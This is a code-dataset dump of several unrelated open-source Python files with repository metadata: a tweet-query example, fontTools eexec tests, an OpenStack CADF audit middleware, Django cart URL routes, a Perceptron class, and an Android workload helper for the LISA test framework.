c15a4f8299ef4618c96f74576b40f1f45f5e9755 | 1,316 | py | Python | Main.py | nsang0u/TweetMapping | 9e88fea27a4d7fc669d4ea5ad669491c4f8b99c2 | [
"MIT"
] | null | null | null | Main.py | nsang0u/TweetMapping | 9e88fea27a4d7fc669d4ea5ad669491c4f8b99c2 | [
"MIT"
] | null | null | null | Main.py | nsang0u/TweetMapping | 9e88fea27a4d7fc669d4ea5ad669491c4f8b99c2 | [
"MIT"
] | null | null | null | '''
Examples of how to query for tweets with the 'got' package.
'''
import got
def main():
def printTweet(descr, t):
        print(descr)
        print("Username: %s" % t.username)
        print("Retweets: %d" % t.retweets)
        print("Text: %s" % t.text)
        print("Mentions: %s" % t.mentions)
        print("Hashtags: %s\n" % t.hashtags)
# Example 1 - Get tweets by username
tweetCriteria = got.manager.TweetCriteria().setUsername('barackobama').setMaxTweets(1)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)[0]
printTweet("### Example 1 - Get tweets by username [barackobama]", tweet)
# Example 2 - Get tweets by query search
tweetCriteria = got.manager.TweetCriteria().setQuerySearch('europe refugees').setSince("2015-05-01").setUntil("2015-09-30").setMaxTweets(1)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)[0]
printTweet("### Example 2 - Get tweets by query search [europe refugees]", tweet)
# Example 3 - Get tweets by username and bound dates
tweetCriteria = got.manager.TweetCriteria().setUsername("barackobama").setSince("2015-09-10").setUntil("2015-09-12").setMaxTweets(1)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)[0]
printTweet("### Example 3 - Get tweets by username and bound dates [barackobama, '2015-09-10', '2015-09-12']", tweet)
if __name__ == '__main__':
main()
| 35.567568 | 140 | 0.715805 |
4c508dd7b24bf9e5963375d855cb8106f9dfdb65 | 492 | py | Python | Tests/misc/eexec_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-07T16:29:02.000Z | 2020-05-07T16:29:02.000Z | Tests/misc/eexec_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 74 | 2020-01-30T07:27:54.000Z | 2021-08-03T05:47:17.000Z | Tests/misc/eexec_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-01-22T20:06:09.000Z | 2020-01-22T20:06:09.000Z | from fontTools.misc.py23 import *
from fontTools.misc.eexec import decrypt, encrypt
def test_decrypt():
testStr = b"\0\0asdadads asds\265"
decryptedStr, R = decrypt(testStr, 12321)
assert decryptedStr == b'0d\nh\x15\xe8\xc4\xb2\x15\x1d\x108\x1a<6\xa1'
assert R == 36142
def test_encrypt():
testStr = b'0d\nh\x15\xe8\xc4\xb2\x15\x1d\x108\x1a<6\xa1'
encryptedStr, R = encrypt(testStr, 12321)
assert encryptedStr == b"\0\0asdadads asds\265"
assert R == 36142
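# A round-trip sketch (not part of the original tests): encrypt followed by
# decrypt with the same key recovers the original bytes. The key 55665 and
# the sample data are assumed here purely for illustration.
def test_roundtrip():
    data = b"hello eexec"
    encrypted, _ = encrypt(data, 55665)
    decrypted, _ = decrypt(encrypted, 55665)
    assert decrypted == data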
| 28.941176 | 74 | 0.693089 |
d1c8e3ebf323c6180fa224d235cd842e52670c36 | 30,409 | py | Python | auditmiddleware/_api.py | Pagolin/openstack-audit-middleware | f7917408684f82da6e64b77fc906514accae04ea | [
"Apache-2.0"
] | null | null | null | auditmiddleware/_api.py | Pagolin/openstack-audit-middleware | f7917408684f82da6e64b77fc906514accae04ea | [
"Apache-2.0"
] | null | null | null | auditmiddleware/_api.py | Pagolin/openstack-audit-middleware | f7917408684f82da6e64b77fc906514accae04ea | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""This package contains the logic for creating events from API requests."""
import collections
import hashlib
import json
import os
import re
import six
import socket
import uuid
import yaml
from oslo_log import log as logging
from pycadf.attachment import Attachment
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import eventfactory
from pycadf import host
from pycadf import reason
from pycadf import resource
ResourceSpec = collections.namedtuple('ResourceSpec',
['type_name', 'el_type_name',
'type_uri', 'el_type_uri', 'singleton',
'id_field', 'name_field',
'custom_actions', 'custom_attributes',
'children', 'payloads'])
# default mappings from HTTP methods to CADF actions
_method_action_map = {'GET': taxonomy.ACTION_READ,
'HEAD': taxonomy.ACTION_READ,
'PUT': taxonomy.ACTION_UPDATE,
'PATCH': taxonomy.ACTION_UPDATE, 'POST':
taxonomy.ACTION_CREATE,
'DELETE': taxonomy.ACTION_DELETE}
# action suffixes for operations on custom keys (modelled as path suffixes)
_key_action_suffix_map = {taxonomy.ACTION_READ: '/get',
taxonomy.ACTION_UPDATE: '/set',
taxonomy.ACTION_CREATE: '/put',
taxonomy.ACTION_DELETE: '/unset'}
# matcher for UUIDs
_UUID_RE = re.compile("[0-9a-f-]+$")
def _make_uuid(s):
if s.isdigit():
return str(uuid.UUID(int=int(s)))
else:
return s
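# Examples (sketch): _make_uuid('42') yields
# '00000000-0000-0000-0000-00000000002a', while non-numeric input such as
# 'abc123' is returned unchanged.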
class ConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
pass
class OpenStackResource(resource.Resource):
"""Extended CADF resource class with custom fields for OpenStack scope."""
def __init__(self, project_id=None, domain_id=None, **kwargs):
"""Initialize a new resource that has an OpenStack scope."""
super(OpenStackResource, self).__init__(**kwargs)
if project_id:
self.project_id = project_id
if domain_id:
self.domain_id = domain_id
def __getattr__(self, item):
"""Circumvent the magic attribute handling of pycadf here."""
if item in ['project_id', 'domain_id']:
return None
else:
return super(OpenStackResource, self).__getattribute__(item)
def str_map(param):
"""Ensure that a dictionary contains only string values."""
if not param:
return {}
for k, v in six.iteritems(param):
if v is not None and (not isinstance(k, six.string_types) or
not isinstance(v, six.string_types)):
raise Exception("Invalid config entry %s:%s (not strings)",
k, v)
return param
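# e.g. str_map({'startup': 'start/startup'}) passes the mapping through
# unchanged, while str_map({'factors': 100}) raises because the value is not
# a string.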
def payloads_config(param):
"""Create a valid payloads config from the config file contents."""
if not param:
return {'enabled': True}
payloads_config = param.copy()
payloads_config['enabled'] = bool(param.get('enabled', True))
return payloads_config
def _make_tags(ev):
"""Build statsd metric tags from CADF event."""
return [
'project_id:{0}'.format(ev.target.project_id or
ev.initiator.project_id or
ev.initiator.domain_id),
'target_type_uri:{0}'.format(ev.target.typeURI),
'action:{0}'.format(ev.action),
'outcome:{0}'.format(ev.outcome)]
class OpenStackAuditMiddleware(object):
"""The actual middleware implementation, a filter for the paste pipe."""
def __init__(self, cfg_file, payloads_enabled, metrics_enabled,
log=logging.getLogger(__name__)):
"""Configure to recognize and map known API paths."""
self._log = log
try:
with open(cfg_file, 'r') as f:
conf = yaml.safe_load(f)
self._payloads_enabled = payloads_enabled
self._service_type = conf['service_type']
self._service_name = conf.get('service_name', self._service_type)
self._service_id = self._build_service_id(self._service_name)
self._prefix_re = re.compile(conf['prefix'])
# default_target_endpoint_type = conf.get('target_endpoint_type')
# self._service_endpoints = conf.get('service_endpoints', {})
self._resource_specs = self._build_audit_map(conf['resources'])
except KeyError as err:
raise ConfigError('Missing config property in %s: %s', cfg_file,
str(err))
except (OSError, yaml.YAMLError) as err:
raise ConfigError('Error opening config file %s: %s',
cfg_file, str(err))
self._statsd = self._create_statsd_client() \
if metrics_enabled else None
def _create_statsd_client(self):
"""Create the statsd client (if datadog package is present)."""
try:
import datadog
return datadog.dogstatsd.DogStatsd(
host=os.getenv('STATSD_HOST', 'localhost'),
port=int(os.getenv('STATSD_PORT', '8125')),
namespace='openstack_audit',
constant_tags=['service:{0}'.format(self._service_type)]
)
except ImportError:
self._log.warning("Python datadog package not installed. No "
"openstack_audit_* metrics will be produced.")
def _build_audit_map(self, res_dict, parent_type_uri=None):
"""Build the resourc hierarchy in a dictionary.
The dictionary maps the resource name used in the REST API's URL
path to the ResourceSpec descriptor. That descriptor contains all
the information needed to produce the CADF events from HTTP requests.
"""
result = {}
for name, s in six.iteritems(res_dict):
res_spec, rest_name = self._build_res_spec(name, parent_type_uri,
s)
# ensure that cust
result[rest_name] = res_spec
return result
def _build_res_spec(self, name, parent_type_uri, spec=None):
"""Build the resource descriptor from and entry in the mapping file.
Parameters:
name: CADF name of the resource type
parent_type_uri: type URI of the parent CADF resource type
(acting as prefix)
spec: mapping entry from the config to be parsed
"""
if not spec:
spec = {}
if parent_type_uri:
pfx = parent_type_uri
else:
pfx = self._service_type
# REST path segment normally equals resource name
rest_name = spec.get('api_name', name)
singleton = spec.get('singleton', False)
type_name = spec.get('type_name')
# derive the type name used for resource representations in JSON from
# the REST name
if not type_name:
type_name = rest_name.replace('-', '_')
if type_name.startswith('os_'):
type_name = type_name[3:]
type_uri = spec.get('type_uri', pfx + "/" + name)
el_type_name = None
el_type_uri = None
childs_parent_type_uri = None
if not singleton:
# derive the name of the individual resource instances (elements)
# by omitting the last character of the resource name
el_type_name = spec.get('el_type_name', type_name[:-1])
el_type_uri = type_uri[:-1]
childs_parent_type_uri = el_type_uri
else:
childs_parent_type_uri = type_uri
res_spec = ResourceSpec(type_name, el_type_name,
type_uri, el_type_uri, singleton,
spec.get('custom_id', 'id'),
spec.get('custom_name', 'name'),
str_map(spec.get('custom_actions')),
str_map(spec.get('custom_attributes')),
self._build_audit_map(
spec.get('children', {}),
childs_parent_type_uri),
payloads_config(spec.get('payloads')))
return res_spec, rest_name
def create_events(self, request, response=None):
"""Build a CADF event from request and response."""
# drop the endpoint's path prefix
path, target_project = self._handle_url_prefix(request)
if not path:
self._log.info("ignoring request with path: %s",
request.path)
return None
# normalize url: remove trailing slash and .json suffix
path = path[:-1] if path.endswith('/') else path
path = path[:-5] if path.endswith('.json') else path
return self._build_events(target_project, self._resource_specs,
None, None, request, response, path, 0)
def _build_events(self, target_project, res_spec, res_id, res_parent_id,
request, response, path, cursor=0):
"""Parse a request recursively and builds CADF events from it.
This methods parses the URL path from left to right and builds the
resource hierarchy from it. The res_spec resource tree is used to
interpret the path segments properly, e.g. known when a path
segment represents a resource name, an ID or an attribute name.
Parameters:
target_project: target project ID if specified in the path
res_spec: resource tree constructed from the mapping file
res_id: ID of the target resource
parent_res_id: ID of the parent resource of the target resource
request: incoming request to parse
response: resulting response to parse (e.g. to obtain results,
just created resource IDs)
path: URL path being parsed
cursor: current position in the path as it is parsed
"""
# Check if the end of path is reached and event can be created finally
if cursor == -1:
# end of path reached, create the event
return self._create_events(target_project, res_id,
res_parent_id,
res_spec, request, response)
# Find next path segment (skip leading / with +1)
next_pos = path.find('/', cursor + 1)
# token = scanned token (NOT keystone token)
token = None
if next_pos != -1:
# that means there are more path segments
token = path[cursor + 1:next_pos]
elif (cursor + 1) < len(path):
# last path segment found, not more '/' right of it
token = path[cursor + 1:]
# handle the current token
if isinstance(res_spec, dict):
# the resource tree node contains a dict => the token contains the
# top-level resource name
sub_res_spec = res_spec.get(token)
if sub_res_spec is None:
# create resource spec on demand using defaults
sub_res_spec = self.register_resource(None, token)
res_spec[token] = sub_res_spec
return self._build_events(target_project, sub_res_spec, None, None,
request,
response,
path, next_pos)
elif isinstance(res_spec, ResourceSpec):
# if the ID is set or it is a singleton, then the next token will
# be an action or child
if res_id or res_spec.singleton or token in res_spec.children:
child_res = res_spec.children.get(token)
if child_res:
# the ID is still the one of the parent (or its parent if
# the direct parent is a singleton)
return self._build_events(target_project, child_res, None,
res_id or res_parent_id, request,
response, path, next_pos)
elif _UUID_RE.match(token):
# next up should be an ID (unless it is a known action)
return self._build_events(target_project, res_spec, token,
res_parent_id, request, response,
path, next_pos)
if next_pos == -1:
# last path segment --> token must be an action or a key
return self._create_events(target_project, res_id,
res_parent_id, res_spec, request,
response, token)
else:
# unknown resource name
# create resource spec on demand ...
res_spec.children[token] = self.register_resource(
res_spec.el_type_uri,
token)
# ... then repeat same call with res_spec now existing
return self._build_events(target_project, res_spec, res_id,
res_parent_id, request, response,
path, cursor)
self._log.warning(
"Unexpected continuation of resource path after segment %s: %s",
token, request.path)
return None
def register_resource(self, parent_type_uri, token):
"""Register an unknown resource to avoid missed events.
The resulting events are a bit raw but contain enough
information to understand what happened. This allows for
incremental improvement.
"""
self._log.warning("unknown resource: %s (created on demand)",
token)
res_name = token.replace('_', '-')
if res_name.startswith('os-'):
res_name = res_name[3:]
res_name = 'X' + res_name
res_dict = {'api_name': token}
sub_res_spec, _ = self._build_res_spec(res_name,
parent_type_uri,
res_dict)
return sub_res_spec
def _create_events(self, target_project, res_id,
res_parent_id,
res_spec, request, response, suffix=None):
events = []
# check for update operations (POST, PUT, PATCH)
if request.method[0] == 'P' and response \
and response.content_length > 0 \
and response.content_type == "application/json":
res_payload = response.json
# check for bulk-operation
if not res_spec.singleton and res_payload and \
isinstance(res_payload.get(res_spec.type_name), list):
# payloads contain an attribute named like the resource
# which contains a list of items
res_pl = res_payload[res_spec.type_name]
req_pl = None
if self._payloads_enabled and res_spec.payloads['enabled']:
req_pl = iter(request.json.get(res_spec.type_name))
# create one event per item
for subpayload in res_pl:
ev = self._create_event_from_payload(target_project,
res_spec,
res_id,
res_parent_id,
request, response,
subpayload, suffix)
pl = next(req_pl) if req_pl else None
if ev:
if pl:
# attach payload if requested
self._attach_payload(ev, pl, res_spec)
events.append(ev)
else:
# remove possible wrapper elements
if res_payload:
res_payload = res_payload.get(res_spec.el_type_name,
res_payload)
event = self._create_event_from_payload(target_project,
res_spec,
res_id,
res_parent_id,
request, response,
res_payload, suffix)
if not event:
return []
# attach payload if requested
if self._payloads_enabled and res_spec.payloads['enabled'] \
and request.content_length > 0 \
and request.content_type == "application/json":
req_pl = request.json
# remove possible wrapper elements
if isinstance(req_pl, dict):
req_pl = req_pl.get(res_spec.el_type_name, req_pl)
self._attach_payload(event, req_pl, res_spec)
events.append(event)
else:
event = self._create_cadf_event(target_project, res_spec, res_id,
res_parent_id,
request, response, suffix)
if not event:
return []
if event and request.method[0] == 'P' \
and self._payloads_enabled \
and res_spec.payloads['enabled']:
self._attach_payload(event, request.json, res_spec)
events = [event]
for ev in events:
if self._statsd:
self._statsd.increment('events',
tags=_make_tags(ev))
return events
def _create_event_from_payload(self, target_project, res_spec, res_id,
res_parent_id, request, response,
subpayload, suffix=None):
self._log.debug("create event from payload: %s",
self._clean_payload(subpayload, res_spec))
ev = self._create_cadf_event(target_project, res_spec, res_id,
res_parent_id, request,
response, suffix)
if not ev:
return None
ev.target = self._create_target_resource(target_project, res_spec,
res_id, res_parent_id,
subpayload)
# extract custom attributes from the payload
for attr, typeURI in six.iteritems(res_spec.custom_attributes):
value = subpayload.get(attr)
if value:
if not isinstance(value, six.string_types):
value = json.dumps(value, separators=(',', ':'))
attach_val = Attachment(typeURI=typeURI, content=value,
name=attr)
ev.add_attachment(attach_val)
return ev
def _create_cadf_event(self, project, res_spec, res_id, res_parent_id,
request, response, suffix):
action, key = self._get_action_and_key(res_spec, res_id, request,
suffix)
if not action:
return None
project_id = request.environ.get('HTTP_X_PROJECT_ID')
domain_id = request.environ.get('HTTP_X_DOMAIN_ID')
initiator = OpenStackResource(
project_id=project_id, domain_id=domain_id,
typeURI=taxonomy.ACCOUNT_USER,
id=request.environ.get('HTTP_X_USER_ID', taxonomy.UNKNOWN),
name=request.environ.get('HTTP_X_USER_NAME', taxonomy.UNKNOWN),
domain=request.environ.get('HTTP_X_USER_DOMAIN_NAME',
taxonomy.UNKNOWN),
host=host.Host(address=request.client_addr,
agent=request.user_agent))
action_result = None
event_reason = None
if response:
if 200 <= response.status_int < 400:
action_result = taxonomy.OUTCOME_SUCCESS
else:
action_result = taxonomy.OUTCOME_FAILURE
event_reason = reason.Reason(
reasonType='HTTP', reasonCode=str(response.status_int))
else:
action_result = taxonomy.UNKNOWN
target = None
if res_id or res_parent_id:
target = self._create_target_resource(project, res_spec, res_id,
res_parent_id, key=key)
else:
target = self._create_target_resource(project, res_spec,
None, self._service_id,
key=key)
target.name = self._service_name
observer = self._create_observer_resource()
event = eventfactory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=action_result,
action=action,
initiator=initiator,
observer=observer,
reason=event_reason,
target=target)
event.requestPath = request.path_qs
# add reporter step again?
# event.add_reporterstep(
# reporterstep.Reporterstep(
# role=cadftype.REPORTER_ROLE_MODIFIER,
# reporter=resource.Resource(id='observer'),
# reporterTime=timestamp.get_utc_now()))
return event
@staticmethod
def _clean_payload(payload, res_spec):
"""Clean request payload of sensitive info."""
incl = res_spec.payloads.get('include')
excl = res_spec.payloads.get('exclude')
res_payload = {}
if excl and isinstance(payload, dict):
# make a copy so we do not change the original request
res_payload = payload.copy()
# remove possible wrapper elements
for k in excl:
if k in res_payload:
del res_payload[k]
elif incl and isinstance(payload, dict):
for k in incl:
v = payload.get(k)
if v:
res_payload[k] = v
else:
res_payload = payload
return res_payload
@staticmethod
def _attach_payload(event, payload, res_spec):
"""Attach request payload to event."""
res_payload = OpenStackAuditMiddleware._clean_payload(
payload, res_spec)
attach_val = Attachment(typeURI="mime:application/json",
content=json.dumps(res_payload,
separators=(',', ':')),
name='payload')
event.add_attachment(attach_val)
def _create_target_resource(self, target_project, res_spec, res_id,
res_parent_id=None, payload=None, key=None):
"""Build the event's target element from the payload."""
project_id = target_project
rid = res_id
name = None
# fetch IDs from payload if possible
if payload:
if isinstance(payload, dict):
name = payload.get(res_spec.name_field)
# some custom ID fields are no UUIDs/strings but just integers
if not rid:
custom_id = payload.get(res_spec.id_field)
rid = str(custom_id) if custom_id else None
project_id = (target_project or payload.get('project_id') or
payload.get('tenant_id'))
else:
project_id = target_project
self._log.warning(
"mapping error, malformed resource payload %s (no dict) "
"in bulk operation on resource: %s",
payload,
res_spec)
type_uri = res_spec.el_type_uri if rid else res_spec.type_uri
rid = _make_uuid(rid or res_parent_id or taxonomy.UNKNOWN)
target = OpenStackResource(project_id=project_id, id=rid,
typeURI=type_uri, name=name)
# provide name of custom keys in attachment of target
if key:
target.add_attachment(Attachment(typeURI="xs:string",
content=key, name='key'))
return target
def _create_observer_resource(self):
"""Build the observer element representing this middleware."""
observer = resource.Resource(typeURI='service/' + self._service_type,
id=self._service_id,
name=self._service_name)
return observer
def _get_action_and_key(self, res_spec, res_id, request, suffix):
"""Determine the CADF action and key from the request.
Depending on already known information, this function will
either use the HTTP method or the payload to determine
which CADF action to report.
Parameters:
res_spec: target resource descriptor
request: the request
suffix: the last path component (already known)
"""
if suffix is None:
return self._get_action_from_method(request.method, res_spec,
res_id), None
if suffix == 'action':
action = self._get_action_from_payload(request, res_spec, res_id)
return action, None
return self._get_action_and_key_from_path_suffix(
suffix, request.method, res_spec, res_id)
@staticmethod
def _get_action_from_method(method, res_spec, res_id):
"""Determine the CADF action from the HTTP method."""
if method == 'POST':
if res_id or res_spec.singleton:
return taxonomy.ACTION_UPDATE
return taxonomy.ACTION_CREATE
elif method == 'GET' or method == 'HEAD':
if res_id or res_spec.singleton:
return taxonomy.ACTION_READ
return taxonomy.ACTION_LIST
elif method == "PATCH":
return taxonomy.ACTION_UPDATE
return _method_action_map[method]
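    # Mapping sketch: GET/HEAD on a collection (no res_id, not a singleton)
    # yields ACTION_LIST but ACTION_READ on an element; POST creates on a
    # collection yet updates an element or singleton; PUT and DELETE fall
    # through to _method_action_map.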
def _get_action_and_key_from_path_suffix(self, path_suffix, method,
res_spec, res_id):
"""Determine the CADF action from the URL path."""
rest_action = path_suffix
# check for individual mapping of action
action = res_spec.custom_actions.get(rest_action)
if action is not None:
return action, None
# check for generic mapping
rule = method + ':*'
if rule in res_spec.custom_actions:
action = res_spec.custom_actions.get(rule)
if action is not None:
return action.replace('*', rest_action), None
else:
# action suppressed by intention
return None, None
# no action mapped to suffix => custom key
action = self._get_action_from_method(method, res_spec, res_id)
action += _key_action_suffix_map[action]
return action, path_suffix
def _get_action_from_payload(self, request, res_spec, res_id):
"""Determine the CADF action from the payload."""
try:
payload = request.json
if payload:
rest_action = next(iter(payload))
# check for individual mapping of action
action = res_spec.custom_actions.get(rest_action)
if action is not None:
return action
# apply generic default mapping rule here
return self._get_action_from_method(
request.method, res_spec, res_id) + '/' + rest_action
else:
self._log.warning("/action URL without payload: %s",
request.path)
return None
except ValueError:
self._log.warning("unexpected empty action payload for path: %s",
request.path)
return None
@staticmethod
def _build_service_id(name):
"""Invent stable UUID for the service itself."""
md5_hash = hashlib.md5(name.encode('utf-8')) # nosec
ns = uuid.UUID(md5_hash.hexdigest())
return str(uuid.uuid5(ns, socket.getfqdn()))
def _handle_url_prefix(self, request):
"""Process the prefix from the URL path and remove it.
:param request: incoming request
:return: URL request path without the leading prefix or None if prefix
was missing and optional target tenant or None
"""
g = self._prefix_re.match(request.path)
if g:
path = request.path[g.end():]
project = None
try:
# project needs to be specified in a named group in order to
# be detected
project = g.group('project_id')
except IndexError:
project = None
return path, project
return None, None
| 41.260516 | 79 | 0.549739 |
b5748b3308bcb97b8bb48ab624b8e808093bff77 | 358 | py | Python | meiduo_mall/apps/carts/urls.py | zzZaida/meiduo_project | aaafdab7bcb61ac4c721e2f76605072b55e931f9 | [
"MIT"
] | null | null | null | meiduo_mall/apps/carts/urls.py | zzZaida/meiduo_project | aaafdab7bcb61ac4c721e2f76605072b55e931f9 | [
"MIT"
] | null | null | null | meiduo_mall/apps/carts/urls.py | zzZaida/meiduo_project | aaafdab7bcb61ac4c721e2f76605072b55e931f9 | [
"MIT"
] | null | null | null | from django.conf.urls import url
from django.contrib import admin
from . import views
urlpatterns = [
    # Shopping cart
url(r'^carts/$', views.CartsView.as_view()),
    # Select all /carts/selection/
url(r'^carts/selection/$', views.CartsSelectAllView.as_view()),
    # Simple cart shown on the product detail page carts/simple/
url(r'^carts/simple/$', views.CartsSimpleView.as_view()),
]
| 19.888889 | 67 | 0.675978 |
5d47d39f49c9e295ffb19ab5da39523762254a0a | 2,489 | py | Python | src/neural_network/Perceptron.py | rudyn2/cc5114 | 16ee51ef168ff395ece6cd4e4bb04a01ee8277cd | [
"MIT"
] | 2 | 2019-08-18T18:35:20.000Z | 2021-12-19T00:52:52.000Z | src/neural_network/Perceptron.py | rudyn2/cc5114 | 16ee51ef168ff395ece6cd4e4bb04a01ee8277cd | [
"MIT"
] | null | null | null | src/neural_network/Perceptron.py | rudyn2/cc5114 | 16ee51ef168ff395ece6cd4e4bb04a01ee8277cd | [
"MIT"
] | null | null | null | from src.neural_network.Neuron import Neuron
import numpy as np
__author__ = "Rudy García Alvarado"
class Perceptron(Neuron):
"""
This class provides the algorithms and tools to implement a Perceptron.
"""
def __init__(self, n_input, activation_func, learning_rate):
super(Perceptron, self).__init__(n_input, activation_func)
self.learning_rate = learning_rate
self.x = None
self.y = None
self.w = None
self.b = None
self.last_error = None
def fit(self, x_train, y_train):
"""
        It receives the training data and stores it in the neuron. The
        x_train array must be 2-dimensional and its second dimension must be
        equal to the n_input of the neuron.
:param x_train: Numpy array 2D
:param y_train: Numpy array 1D
"""
assert x_train.shape[1] == self.n_input, "This neuron can't fit the dimension of the input."
self.x = x_train
self.y = y_train
def train(self):
"""
        This method trains the perceptron using the simple learning rule of
        the McCulloch-Pitts perceptron model. The learned weights are stored
        in the w attribute and the bias in b.
"""
# Init a weights vector
self.w = np.zeros(shape=(self.x.shape[1], 1))
# Init the bias
b = (np.random.random()*-1 + np.random.random())*2
error = []
# Training using perceptron algorithm
for i in range(self.x.shape[0]):
ex = self.x[i, :]
desired_output = self.y[i]
# Predicts the output
predicted_output = np.matmul(ex, self.w) + b
# Calculate the difference between real and predicted output
diff = float(desired_output-predicted_output)
error.append(diff)
self.w += self.learning_rate*diff*(ex.reshape(self.w.shape[0], 1))
b += self.learning_rate*diff
self.b = b
self.last_error = error
def predict(self):
"""
Executes a forward propagation in the network and outputs the result. This was designed to
perform logical operations between just n operators.
:return: A Numpy Array with the predicted values.
"""
result = np.matmul(self.x, self.w) + self.b
return np.array(result)
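# Minimal usage sketch (not part of the original module). It assumes the
# Neuron base class stores n_input and accepts activation_func=None, which is
# unused by train()/predict() here. The toy data encodes a logical AND.
if __name__ == '__main__':
    x_demo = np.array([[0, 0], [0, 1], [1, 0], [1, 1]] * 25)
    y_demo = np.array([0, 0, 0, 1] * 25)
    perceptron = Perceptron(n_input=2, activation_func=None, learning_rate=0.1)
    perceptron.fit(x_demo, y_demo)
    perceptron.train()
    print(perceptron.predict())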
| 32.324675 | 113 | 0.588992 |
9415a85c9d306803d22c14571d0f8873e2206017 | 12,737 | py | Python | libs/utils/android/workload.py | DennissimOS/platform_external_lisa | c8745316dd428d6bc5b939bbc83995c33e441b8a | [
"Apache-2.0"
] | null | null | null | libs/utils/android/workload.py | DennissimOS/platform_external_lisa | c8745316dd428d6bc5b939bbc83995c33e441b8a | [
"Apache-2.0"
] | null | null | null | libs/utils/android/workload.py | DennissimOS/platform_external_lisa | c8745316dd428d6bc5b939bbc83995c33e441b8a | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2015, ARM Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import re
import webbrowser
import time
from collections import namedtuple
from gfxinfo import GfxInfo
from surfaceflinger import SurfaceFlinger
from devlib.utils.android_build import Build
from . import System
class Workload(object):
"""
Base class for Android related workloads
"""
_packages = None
_availables = {}
WorkloadPackage = namedtuple("WorkloadPackage", "package_name apk_path src_path")
def __init__(self, test_env):
"""
Initialized workloads available on the specified test environment
test_env: target test environment
"""
self._te = test_env
self._target = test_env.target
self._log = logging.getLogger('Workload')
# Set of data reported in output of each run
self.trace_file = None
self.nrg_report = None
# Hooks to run at different points of workload execution
self.hooks = {}
def _adb(self, cmd):
return 'adb -s {} {}'.format(self._target.adb_name, cmd)
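    # e.g. _adb('logcat -d') formats to 'adb -s <serial> logcat -d', where
    # <serial> is the target's adb_name.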
@classmethod
def _packages_installed(cls, sc, allow_install):
# If workload does not have packages just return
if not hasattr(sc, 'packages'):
return True
# Require package to be installed unless it can be installed when allowed
if allow_install:
            required_packages = [package.package_name for package in sc.packages if package.apk_path is None]
else:
required_packages = [package.package_name for package in sc.packages]
return all(p in cls._packages for p in required_packages)
@classmethod
def _build_packages(cls, sc, te):
bld = Build(te)
for p in sc.packages:
            if p.src_path is not None:
bld.build_module(p.src_path)
return True
@classmethod
def _install_packages(cls, sc, te):
for p in sc.packages:
System.install_apk(te.target,
'{}/{}'.format(te.ANDROID_PRODUCT_OUT, p.apk_path))
        return True
@classmethod
def _subclasses(cls):
"""
Recursively get all subclasses
"""
nodes = cls.__subclasses__()
return nodes + [child for node in nodes for child in node._subclasses()]
@classmethod
def _check_availables(cls, test_env):
"""
List the supported android workloads which are available on the target
"""
_log = logging.getLogger('Workload')
# Getting the list of installed packages
cls._packages = test_env.target.list_packages()
_log.debug('Packages:\n%s', cls._packages)
_log.debug('Building list of available workloads...')
for sc in Workload._subclasses():
_log.debug('Checking workload [%s]...', sc.__name__)
# Check if all required packages are installed or can be installed
if cls._packages_installed(sc, True):
cls._availables[sc.__name__.lower()] = sc
_log.info('Supported workloads available on target:')
_log.info(' %s', ', '.join(cls._availables.keys()))
@classmethod
def getInstance(cls, test_env, name, reinstall=False):
"""
Get a reference to the specified Android workload
:param test_env: target test environment
:type test_env: TestEnv
:param name: workload name
:type name: str
:param reinstall: flag to reinstall workload applications
:type reinstall: boolean
"""
# Initialize list of available workloads
if cls._packages is None:
cls._check_availables(test_env)
if name.lower() not in cls._availables:
msg = 'Workload [{}] not available on target'.format(name)
raise ValueError(msg)
sc = cls._availables[name.lower()]
if (reinstall or not cls._packages_installed(sc, False)):
if (not cls._build_packages(sc, test_env) or
not cls._install_packages(sc, test_env)):
msg = 'Unable to install packages required for [{}] workload'.format(name)
raise RuntimeError(msg)
ret_cls = sc(test_env)
# Add generic support for cgroup tracing (detect if cgroup module exists)
if ('modules' in test_env.conf) and ('cgroups' in test_env.conf['modules']):
# Enable dumping support (which happens after systrace starts)
ret_cls._log.info('Enabling CGroup support for dumping schedtune/cpuset events')
ret_cls.add_hook('post_collect_start', ret_cls.post_collect_start_cgroup)
# Also update the extra ftrace points needed
if not 'systrace' in test_env.conf:
test_env.conf['systrace'] = { 'extra_events': ['cgroup_attach_task', 'sched_process_fork'] }
else:
if not 'extra_events' in test_env.conf['systrace']:
test_env.conf['systrace']['extra_events'] = ['cgroup_attach_task', 'sched_process_fork']
else:
test_env.conf['systrace']['extra_events'].extend(['cgroup_attach_task', 'sched_process_fork'])
return ret_cls
def trace_cgroup(self, controller, cgroup):
cgroup = self._te.target.cgroups.controllers[controller].cgroup('/' + cgroup)
cgroup.trace_cgroup_tasks()
def post_collect_start_cgroup(self):
# Since systrace starts asynchronously, wait for trace to start
while True:
if self._te.target.execute('cat /d/tracing/tracing_on')[0] == "0":
time.sleep(0.1)
continue
break
self.trace_cgroup('schedtune', '') # root
self.trace_cgroup('schedtune', 'top-app')
self.trace_cgroup('schedtune', 'foreground')
